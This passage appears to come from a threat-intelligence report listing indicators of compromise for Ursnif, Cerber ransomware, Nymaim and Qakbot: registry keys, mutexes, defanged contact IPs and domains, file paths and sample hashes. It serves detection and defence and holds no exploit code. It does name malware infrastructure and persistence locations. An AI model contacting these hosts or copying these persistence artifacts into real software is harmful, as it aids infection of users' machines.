%System32%\drivers\etc\hosts1
%APPDATA%\Screenshots1
%TEMP%\install.vbs1
\??\scsi#disk&ven_red_hat&prod_virtio#4&2556063a&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1
%TEMP%\MyttloApp1
%TEMP%\tmpD22A.tmp1
%TEMP%\subos1
%TEMP%\tmpD4E9.tmp1
%TEMP%\subos\subose.exe1
See JSON for more IOCs
File Hashes
  • 0758f55d7c977e33b0c64c6bdf273d1fc639440505d3f015c5d519dc6200017f
  • 17537f41d384c9a3fe385e6ec51feacf23dcab755b26e274bddcb25ad51f3b20
  • 3409a0970239cd2fc61b66db3c6e7c49921b2c828b59530e37dc34504ee46081
  • 446166d1a9e7e1b7e12547510f7de7bc4c281681cce1f9f8576fce9de7b1dc05
  • 5c0016d2122382734395929696e2d737162f797bb4e21ab1cb9af7c9429823bf
  • 63053625336da966b1c41eae9b39dfc6dd6829be50852d657f48cf6351102955
  • 71795cda989e98003d22a59a88951ce0c2b1dd472b5c1bea4f79f03e0f22747c
  • 7634476cf6e1d538bbf9b5dc0b2dad3f55d78a7a0699f0aa3ec1a926867b602d
  • b0ab801164d28470c2e76fa775ace286b9c218eed099373ba6a6b879cb9473f4
  • c433ec83fd1ab4c370c218feda1fde4514573278464cff96c053479d5c6aea95
  • c68c68c512cd5b66fbc56df273f55bc8e9db9e5c3840dc28d905ca676029f86b
  • dfaf92e94e698ded2dfec6fde877118a2ed30d2709ce8c431d35ca3ce9d7f836
  • e6a4c246c552c5152b500443a603304bac2edbeb2925c4da2e3bf457351b66c1
  • f08bf06ef32de3aea50ded12434753f08c336408715fdcc7ab263cf95892bd5b
  • f5f336ac45dec2fa199ce54cc93035967037f7550ad9ddc89f9dfc91918d57c8

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Ursnif-6957672-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\SOFTWARE\WOW6432NODE\JAVASOFT\JAVA WEB START\1.6.0_41
Value Name: Home
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY
Value Name: AddToFavoritesInitialSelection
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOWREGISTRY
Value Name: AddToFeedsInitialSelection
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\WINDOWSSEARCH
Value Name: Version
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\RECOVERY\PENDINGRECOVERY
Value Name: AdminActive
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP
Value Name: ChangeNotice
19
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MINIE
Value Name: TabBandWidth
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{2A541AE1-5BF6-4665-A8A3-CFA9672E4291}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{72853161-30C5-4D22-B7F9-0BBC1D38A37E}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{B4F3A835-0E21-4959-BA22-42B3008E02FF}
Value Name: CompatBlockPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DBC80044-A445-435B-BC74-9C25C1C588A9}
Value Name: NewInstallPromptCount
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{DBC80044-A445-435B-BC74-9C25C1C588A9}
Value Name: CompatBlockPromptCount
19
<HKU>\Software\Microsoft\Internet Explorer\Recovery\Active 19
<HKU>\Software\Microsoft\CTF\TIP\{1188450c-fdab-47ae-80d8-c9633f71be64}\LanguageProfile\0x00000000\{63800dac-e7ca-4df9-9a5c-20765055488d} 19
<HKLM>\SOFTWARE\Classes\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32 19
<HKU>\Software\Microsoft\Internet Explorer\Suggested Sites 19
<HKU>\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\Links 19
<HKU>\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{2670000A-7350-4F3C-8081-5663EE0C6C49}\iexplore 19
MutexesOccurrences
!PrivacIE!SharedMem!Mutex19
Local\VERMGMTBlockListFileMutex19
Local\!BrowserEmulation!SharedMemory!Mutex19
Local\URLBLOCK_DOWNLOAD_MUTEX19
Local\URLBLOCK_HASHFILESWITCH_MUTEX19
UpdatingNewTabPageData19
{5312EE61-79E3-4A24-BFE1-132B85B23C3A}19
{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}19
{A7AAF118-DA27-71D5-1CCB-AE35102FC239}18
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}18
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}18
Local\{B1443895-5CF6-0B1E-EE75-506F02798413}18
CommunicationManager_Mutex15
SmartScreen_AppRepSettings_Mutex15
SmartScreen_ClientId_Mutex15
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_17606
{33B6645E-F685-DDC4-9817-8A614C3B5E25}6
{9FB8F914-72AD-292E-7443-C66DE8275AF1}4
{EF2CA93C-8275-F9B6-0493-D63D78776AC1}3
{1FE6DE6D-F2FC-A937-F4C3-46ED68A7DA71}3
Local\URLBLOCK_FILEMAPSWITCH_MUTEX_19163
{27CB7058-5ACE-F149-9C4B-2EB590AF42B9}3
\BaseNamedObjects\Local\{FCAA51DD-2B0A-8E99-95F0-8FA2992433F6}3
\BaseNamedObjects\Local\{6AE7CB31-C1EF-2C06-9B3E-8520FF528954}3
\BaseNamedObjects\Local\{72534A3F-299C-7437-43C6-6DE8275AF19C}3
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
204[.]79[.]197[.]20019
185[.]193[.]141[.]6019
208[.]67[.]222[.]22218
194[.]147[.]35[.]9518
13[.]107[.]21[.]20013
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
vmelynaa[.]club19
resolver1[.]opendns[.]com18
222[.]222[.]67[.]208[.]in-addr[.]arpa18
myip[.]opendns[.]com18
ciemona[.]top18
zwbaoeladiou[.]xyz16
fqwalfredoesheridan[.]info16
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Protect\S-1-5-21-2580483871-590521980-3826313501-500\Preferred19
%LOCALAPPDATA%Low\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V0100008.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V0100009.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V010000A.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V010000B.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V010000D.log19
%LOCALAPPDATA%\Microsoft\Windows\WebCache\V010000F.log19
%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5\MSHist012018082820180829\container.dat19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\suggestions[2].en-US19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[2].ico19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\views[2]19
%LOCALAPPDATA%\Microsoft\Internet Explorer\imagestore\aowwxkh\imagestore.dat19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\favicon[1].ico19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\favicon[2].png19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\views[1]19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[1].ico19
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL219
%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW19
%HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\C5MZMU22\desktop.ini19
%TEMP%\www2.tmp19
%TEMP%\www3.tmp19
%TEMP%\www4.tmp19
%HOMEPATH%\Favorites\Links\Suggested Sites.url19
%HOMEPATH%\Local Settings\Application Data\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\Suggested Sites~.feed-ms19
See JSON for more IOCs
File Hashes
  • 0870f99237954ec3b6c5d2bef78a68484ec211bdd3f98439570d6a316c8a15ee
  • 395a5bb5a15f3d0c277835b62372c985cf718cdd2b1a5a504b5e9433c5dab8a5
  • 44e6613a20fda10678242f331152b6377edc18a3bbece8a7546ef54fe2dbb9d2
  • 4509bfad5dacb2f5ac43483fb991fa5bba25b90a46a1829d5d812be529dff930
  • 5bdab30c2318e1a15917c5a5fa5a970845e473c3df7e3baf134393d9fe7dd1c5
  • 6c29026c61c2bcf1502ffa77b56d2b41504598e6b660cb4f4aadeef547248861
  • 8caac9f128ef6d7cd20ad6395b16fc180456eed45d86b68b49b87b4b57aa0142
  • 8cc7ec0c3662c3e68a0063f9aa37943eb83ac6cd472a76f9f047e0fad21f9875
  • 8df6c10dd50118b2fc7bd380d0423ad0d7a36630f2f6be81fe508eb0b7d409cb
  • b824f4bb9174eda6738710e1fed13a74088e2c23d8c31ce81ecde3cd03260396
  • c3f72c971d83fd3ac32d8bbee2d94fe78bcbde553212f3e4c3d626a8d124ccb6
  • d1d54cc60dfc5957d76c37218d89bf59aaa45c4cc45067af83429280463923e5
  • e450ad1c3dad95a579f43bf2deb9b58acc8c661e0090a162da75dd66ef608e8b
  • e7f7e41a55b11e5aee84f519b267c19c5943ca923b8c05d3aff99a47ab074f58
  • f1fc8274b0155470b6983ba68c70ea5df59196ae8b89366fc4fe922575719536
  • f58c95835e8a08cbef55c00ae86d03399302cdf7d500ab499f312156f275f2f9
  • f5e3128f71497dd5ee29c05296c3815466fd2eacc714ce914771d0ede672639c
  • fb7592a3c2994ba426046328c87f08574c7d367b0c75e206ddfd32cc5d7bfcd0
  • fb76a896e5ead6658b589c20e715fe18ffec03b9f57f895e14a0d43574de71e3

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Ransomware.Cerber-6957317-0


Indicators of Compromise


Registry KeysOccurrences
<HKLM>\System\CurrentControlSet\Services\NapAgent\Shas 25
<HKLM>\System\CurrentControlSet\Services\NapAgent\Qecs 25
<HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2 25
<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\Enroll\HcsGroups 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NAPAGENT\LOCALCONFIG\UI 25
<HKLM>\System\CurrentControlSet\Control\Session Manager 25
<HKU>\Software\Microsoft\Windows\ShellNoRoam\MUICache 25
<HKCU>\CONTROL PANEL\DESKTOP
Value Name: Wallpaper
25
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER
Value Name: PendingFileRenameOperations
25
<HKLM>\SYSTEM\ControlSet001\Control\Session Manager 25
<HKLM>\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\189271E573FED295A8C130EAF357A20C4A9F115E 9
<HKLM>\System\CurrentControlSet\Control\SecurityProviders\Schannel 6
MutexesOccurrences
Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb725
shell.{381828AA-8B28-3374-1B67-35680555C5EF}25
\BaseNamedObjects\shell.{718951EE-6DB9-E41A-53AA-8B715AE18B45}2
\BaseNamedObjects\shell.{493BC5E1-8EB5-5EFC-281D-65B759CEECC3}2
\BaseNamedObjects\shell.{B1A92788-E01E-5F0F-2EBD-8C1B64B4440E}1
\BaseNamedObjects\shell.{3B5BBD57-DC86-C667-6198-1ED86151C492}1
\BaseNamedObjects\shell.{3290A7F9-5947-C52F-A9C4-FFC568696593}1
\BaseNamedObjects\shell.{A90EDFAB-A502-430E-BDBC-2A277AABA37D}1
\BaseNamedObjects\shell.{FCDAE584-CD77-B6D4-3AF3-33D1E72CBBA2}1
\BaseNamedObjects\shell.{5ED88314-B21B-6A1E-9E28-1194C46E655A}1
\BaseNamedObjects\shell.{0382099C-AC13-59BE-3A2C-B533D776D30C}1
\BaseNamedObjects\shell.{8A1F6AB1-121B-A240-F2AC-6815C5405429}1
\BaseNamedObjects\shell.{6B956E68-ABAA-AB50-EB9F-299C556E0FC1}1
\BaseNamedObjects\shell.{D593CF55-EF38-7E41-B3D1-189932BF5ACA}1
\BaseNamedObjects\shell.{6E8CD1E8-3AA4-8152-A1AC-9DF81B4CF52F}1
\BaseNamedObjects\shell.{CA80F6A6-97F3-B746-F936-72E156EADCA1}1
\BaseNamedObjects\shell.{77337C05-6A9D-48D8-548B-5BC4EDE52644}1
\BaseNamedObjects\shell.{5F59AF38-9EAC-3B8F-A08E-700EC4307348}1
\BaseNamedObjects\shell.{1DEF893E-C150-B52C-8B2C-18DC50905097}1
\BaseNamedObjects\shell.{114716B6-D98A-FB35-E73B-ABDB1C2ECBE3}1
\BaseNamedObjects\shell.{940BFEC0-D658-3349-9964-7D4820AF7C5D}1
\BaseNamedObjects\shell.{DCA07E8B-8FF0-AAD5-5A30-43E0A4FC3355}1
\BaseNamedObjects\shell.{9F3E7036-D399-5D1C-15F0-27F90C81CEA7}1
\BaseNamedObjects\shell.{4D979936-6ECD-C1FC-8B7E-C65E6397B59E}1
\BaseNamedObjects\shell.{2981A90C-3618-499B-5205-FD704DC8D53D}1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
178[.]33[.]160[.]17625
178[.]33[.]160[.]17525
178[.]33[.]160[.]17825
178[.]33[.]160[.]17725
178[.]33[.]160[.]17925
178[.]33[.]160[.]17025
178[.]33[.]160[.]17225
178[.]33[.]160[.]17125
178[.]33[.]160[.]19625
178[.]33[.]160[.]19525
178[.]33[.]160[.]19825
178[.]33[.]160[.]19725
178[.]33[.]160[.]19925
178[.]33[.]160[.]19025
178[.]33[.]160[.]19225
178[.]33[.]160[.]19125
178[.]33[.]160[.]19425
178[.]33[.]160[.]19325
178[.]33[.]159[.]3125
178[.]33[.]159[.]3025
178[.]33[.]159[.]2925
178[.]33[.]159[.]2825
178[.]33[.]159[.]2725
178[.]33[.]159[.]2625
178[.]33[.]159[.]2525
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
api[.]blockcypher[.]com25
chain[.]so13
bitaps[.]com13
btc[.]blockr[.]io13
hjhqmbxyinislkkt[.]1j9r76[.]top12
www[.]coinbase[.]com9
p27dokhpz2n7nvgr[.]1j9r76[.]top6
hjhqmbxyinislkkt[.]1bxzyr[.]top3
Files and or directories createdOccurrences
%HOMEPATH%\Documents\OneNote Notebooks\Personal\General.one25
%HOMEPATH%\Documents\OneNote Notebooks\Personal\Unfiled Notes.one25
%HOMEPATH%\Documents\Outlook Files\Outlook.pst25
%HOMEPATH%\Documents\RILLReturn.ppt25
%HOMEPATH%\Documents\SerialsOverview.ppt25
%HOMEPATH%\Documents\TSR_Observations_2-14-2007.doc25
%HOMEPATH%\Documents\VISSpring13Schedule.pdf25
%HOMEPATH%\Documents\booklaunch_e.doc25
%HOMEPATH%\Documents\featureb0906.pdf25
%HOMEPATH%\Documents\genealogy.ppt25
%HOMEPATH%\Documents\greenpaper.doc25
%HOMEPATH%\Documents\james_harrison_public_forum_presentation_e.doc25
%HOMEPATH%\Documents\self-guided_SoE_Tour.pdf25
%HOMEPATH%\Documents\sshws_2012rev.pdf25
%HOMEPATH%\Documents\timeentrylimit.xlsx25
%HOMEPATH%\Documents\workshopagenda10may2001_e.doc25
%TEMP%\d19ab98925
%TEMP%\d19ab989\4710.tmp25
%TEMP%\d19ab989\a35f.tmp25
%LOCALAPPDATA%\Microsoft\Office\Groove\System\CSMIPC.dat25
\DAV RPC SERVICE25
\Device\Null25
%APPDATA%\Microsoft\Outlook\Outlook.srs25
%APPDATA%\Microsoft\Outlook\Outlook.xml25
%HOMEPATH%\Local Settings\Application Data\Microsoft\Office\ONetConfig\21d4feba3519c30e149fdf62432f198a.xml25
See JSON for more IOCs
File Hashes
  • 0536d5867571e0ed9998dfe458e7cf42334a9abc67e1cbd9ea3004507f899e3c
  • 17f6fab817ae1a1ac4478c121c3dcfed044924ba4beac8cae734cd14d453596b
  • 212ef6edb374b8aab38ad19fa15e2e2f4674b7d2cbb024f36b9477fc71c71769
  • 276438f97b45ccd5ff93586ae0adfa3c4e4ba92f1adc87fca607eb6d6bd17919
  • 2b7669616638e5976b1c65b492d9e775ab668648d0b2ca5df81bcbe26b7e1123
  • 33dcb7c8ce845f1840cb6508a67595d415227babe474eae0f3a06383eab16e63
  • 3d5bab5798ad6d27131075732d829b90f3f37d5e63bab43b53a071c002678fce
  • 418a712f9e44f3adba6125d9f3d7ad4a52ffef9d8ad5b485e903a984a4cd8c63
  • 420dc43a8c9200df4138d720415304017b861b3cfddfb5de16af50099f3b0e37
  • 436e308c38fb3872fe1a64be90eed2a86d7f9806cd163c83e83fbfd0edf3f8d8
  • 55e8cb67e967b51aacd85258cc4c5a2d8c7c2ad48e44d6f4ecf9c0a721d4fbfe
  • 57de16edb0bd7e590ad1adf4474b18eb968d72781f0d34f33ee51cf6ed71763e
  • 5da318b569c3cbad701f06f4b26905c5ac95048b748481fae2552653acdeb25b
  • 629c1b76328b10077af530bfc5526fcb5592eefd8fb0b618179a8429bf6b6259
  • 64b193a1fcdd2d2ec2444e989ecb9283a5f7679abfc5dc3efa9a248793e0197c
  • 6e7bc2af711eac2a82384b3738229d3b69f60f1522a0c59f781f4d6731b1f198
  • 763b5c07061e6f306399991efd08ac8b9efb74c37ab6280c840a779fb7ca929c
  • 77ee427b01cecdc4adcdee50b679ddab7ae6175a9ec3ec199b81cbfb3684a172
  • 7e93d6b812b9ba8833a2f6727e35714ae301c8ab8ac9988ae540f4a993e41c05
  • 84d4734cd55e627870c58fe07bd29895cc40726ea235de6980c1ebe73c8f838c
  • 9d60618b662ed064573688abf10cb3eb562b46baceb864a4343e8851b2e6686e
  • a2dd530ea97e84d507d13eccef73f736ef1c7c2722b82c84e6d84c61f9406f9b
  • a6943fd03952cc9d1b7a492ca30cc75ecaefdb54e20af0fc0dcbbcc93483d031
  • a9efbbec61b1901e23bd5d29f2e1c34e9d0e7c41dbd216386ec52489239068fe
  • b0ba2997331995d24a85a7d4f586fcaaeb4e6b62de46f068d165ef0d13b172cc
  • See JSON for more IOCs

Coverage


Screenshots of Detection

AMP

ThreatGrid


Umbrella

Malware

Win.Dropper.Nymaim-6956636-0


Indicators of Compromise


Registry KeysOccurrences
<HKCU>\Software\Microsoft\GOCFK 19
<HKLM>\Software\Wow6432Node\Microsoft\Tracing\tapi3 19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: EnableFileTracing
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: EnableConsoleTracing
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: FileTracingMask
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: ConsoleTracingMask
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: MaxFileSize
19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\TRACING\TAPI3
Value Name: FileDirectory
19
<HKCU>\SOFTWARE\MICROSOFT\GOCFK
Value Name: mbijg
19
<HKCU>\Software\Microsoft\FROD 18
MutexesOccurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1}19
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A}19
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5}19
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368}19
Local\{306BA354-8414-ABA3-77E9-7A7F347C71F4}19
Local\{F58B5142-BC49-9662-B172-EA3D10CAA47A}19
Local\{C170B740-57D9-9B0B-7A4E-7D6ABFCDE15D}19
Local\{B888AC68-15DA-9362-2153-60CCDE3753D5}19
Local\{2DB629D3-9CAA-6933-9C2E-D40B0ACCAC9E}19
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
N/A-
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
otmqa[.]in18
nuyfyp[.]in18
omctebl[.]pw18
qxqdslcvhs[.]pw18
eyhwvkyswsts[.]in18
lqeyztwnmqw[.]pw18
tgkddewbn[.]in18
bibmbkjvelox[.]net18
mpoghxb[.]net18
zglevl[.]net18
cixhrfbok[.]com18
yqxpvvbvncxr[.]com18
vhmfwvrbln[.]net18
pyioepars[.]com18
iwxbgsvj[.]net18
Files and or directories createdOccurrences
%ProgramData%\ph19
%ProgramData%\ph\fktiipx.ftf19
%TEMP%\gocf.ksv19
%TEMP%\fro.dfx18
\Documents and Settings\All Users\pxs\pil.ohu18
%LOCALAPPDATA%\7z25
%APPDATA%\s2695
%ProgramData%\hm94p643
%LOCALAPPDATA%\28703
%APPDATA%\710i5v83
%ProgramData%\05n33
%ProgramData%\0m23
%ProgramData%\j91z2
%LOCALAPPDATA%\9b82
%APPDATA%\mb312
%ProgramData%\6745h2
%ProgramData%\63h6c2
%LOCALAPPDATA%\546byxl2
%APPDATA%\k5f52
%APPDATA%\1ok411c1
%ProgramData%\84q9q1
%LOCALAPPDATA%\6b0d19t1
%APPDATA%\9980c1
%ProgramData%\2p077d1
%LOCALAPPDATA%\ja68siv1
See JSON for more IOCs
File Hashes
  • 0a79d985e81449aeabc401545955323e3d9fa0951a6fabe8727370679cee362c
  • 2d7e1dee56892ffe3fa7b85e33ef512e8017ce690a1118ad743736ba03c70c29
  • 2f017b1f3b3d430266be3da2be7b050dad8d2bbdfe457d6d053f2ca312c90691
  • 33c2883874a24e9abbd993f5d06b8596483d33a388b4832f7e8ed3585dab0f80
  • 4268fb8266c18ba7392e2ac655dad69b952bcfce10a71b34a821f0ea32a02954
  • 470dad272252de1d8631e7026ee324fa9238f722707a26f56b6377f2588a7b16
  • 4ff4835419292e13a5d7be1fe2b3b6a000a07f733948e5865b09082e91ef364b
  • 50bc7a1d67f67fbe4faaa7e1968addc631ee65c05dffdac6decfd021306d17c7
  • 5814f51e35d047cfd4e2b4d76bb2b401d70a860747b7ba817fe3bb035dea1b98
  • 68e743d3ab393a17a9120260b6e2c1a1fcea3ba32cebc06aa1970d62198f266d
  • 7e95831b38b1a32402ba5b6251180aca1b1cad457be756612b3ffe1ebf40dce2
  • 8b307748efc603648524dc47202a550bfcaee9a3a23da4f99802aef2e789d6cd
  • 9260c5ea2694dd47cbe563d7d39518d4b4f1249499dcae387e2da9955723286f
  • a92aec525fddbe52002ba700344043cd99b8d1323728b9cc2114e64bf83c7ce3
  • aca7c6cb8d0edcb41b44a0f53460ee8ac3078aca97f03979da0b1d4d5dfb860b
  • b01ecd3e51d9efea860568d3ae336c7d3514f08bca6d3ba9c5cfd3ad069ec3fe
  • d618459cbcf86c6797850757003d53db2f8bcc89364bf7de806f89f1736bf1cd
  • d6a5f0855e7e2c8968e90159b42853361187b41d692626273807361c27bd5a37
  • db421df81c436e54428bcaddcb394568afcd6769e88809a2634ea678643ec811

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Dropper.Qakbot-6956539-0


Indicators of Compromise



Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: internat.exe
25
<HKCU>\Software\Microsoft\SystemCertificates\UserDS 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\aqejpwsx 25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Type
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: Start
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ErrorControl
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ImagePath
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DisplayName
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnService
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: DependOnGroup
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: WOW64
25
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\AQEJPWSX
Value Name: ObjectName
25
<HKLM>\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931 3
<HKLM>\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\637162CC59A3A1E25956FA5FA8F60D2E1C52EAC6 3
Note that other Registry Keys are leveraged that may contain unicode characters. See JSON for more IOCs
MutexesOccurrences
Global\eqfik25
llzeou25
eqfika25
Global\epieuxzk25
Global\ulnahjoi25
Global\utjvfi25
bzqjzpdrfpamvq25
\BaseNamedObjects\Global\uvesyw2
\BaseNamedObjects\Global\vqxcpp2
\BaseNamedObjects\hxsgmprzlpnnqw2
\BaseNamedObjects\Global\imyuiwlg2
\BaseNamedObjects\Global\vtqux2
\BaseNamedObjects\imyuiwlga2
\BaseNamedObjects\yspopald2
\BaseNamedObjects\Global\rhjga2
\BaseNamedObjects\afalya2
\BaseNamedObjects\iykps2
\BaseNamedObjects\Global\ilkcmoq2
\BaseNamedObjects\Global\afaly2
\BaseNamedObjects\Global\dgialgoh2
\BaseNamedObjects\Global\yvbnyn2
\BaseNamedObjects\Global\knpog2
\BaseNamedObjects\crcbzy2
\BaseNamedObjects\Global\esroi2
\BaseNamedObjects\knpoga2
See JSON for more IOCs
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]12[.]17425
69[.]241[.]80[.]16221
209[.]126[.]124[.]17321
69[.]195[.]124[.]6020
162[.]144[.]12[.]24120
50[.]87[.]150[.]20319
181[.]224[.]138[.]24019
35[.]225[.]160[.]24518
172[.]217[.]164[.]14218
45[.]38[.]189[.]10318
68[.]87[.]56[.]13018
85[.]93[.]89[.]610
209[.]126[.]124[.]1666
207[.]38[.]89[.]1155
85[.]93[.]88[.]2515
69[.]241[.]74[.]1703
69[.]241[.]108[.]583
69[.]241[.]106[.]1023
64[.]34[.]169[.]2442
208[.]100[.]26[.]2341
216[.]218[.]206[.]691
216[.]58[.]217[.]1421
173[.]227[.]247[.]491
173[.]227[.]247[.]541
69[.]64[.]56[.]2441
See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
jpfdtbmvuygvyyrebxfxy[.]info25
hknkmwfdngcfavzhqd[.]biz25
ywubouysdukndoakclnr[.]org25
uwujtnymeyeqovftsc[.]org21
kaaovcddwmwwlolecr[.]org21
ijdlykvhnvrnauvz[.]com21
www[.]ip-adress[.]com21
stc-hstn-03[.]sys[.]comcast[.]net21
boston[.]speedtest[.]comcast[.]net21
houston[.]speedtest[.]comcast[.]net21
sanjose[.]speedtest[.]comcast[.]net21
jacksonville[.]speedtest[.]comcast[.]net21
lunkduuumhmgpnoxkbcjqcex[.]org19
hsyglhiwqfc[.]org18
forumity[.]com18
zebxhuvsz[.]com18
yxssppysgteyylwwprsyyvgf[.]com18
fcptxaleu[.]net18
olosnxfocnlmuw[.]biz18
cbqjxatxrumjpyvp[.]biz18
sproccszyne[.]org18
uschunmmotkylgsfe[.]biz18
wgysvrmqugtimwhozoyst[.]biz18
tkpxkpgldkuyjduoauvwoiwcg[.]org18
cufgghfrxaujbdb[.]com18
See JSON for more IOCs
Files and or directories createdOccurrences
%APPDATA%\Microsoft\Windows\Cookies\QA752KCC.txt25
%APPDATA%\Microsoft\Windows\Cookies\QP9V2VPK.txt25
%APPDATA%\Microsoft\Windows\Cookies\QTOORX9Q.txt25
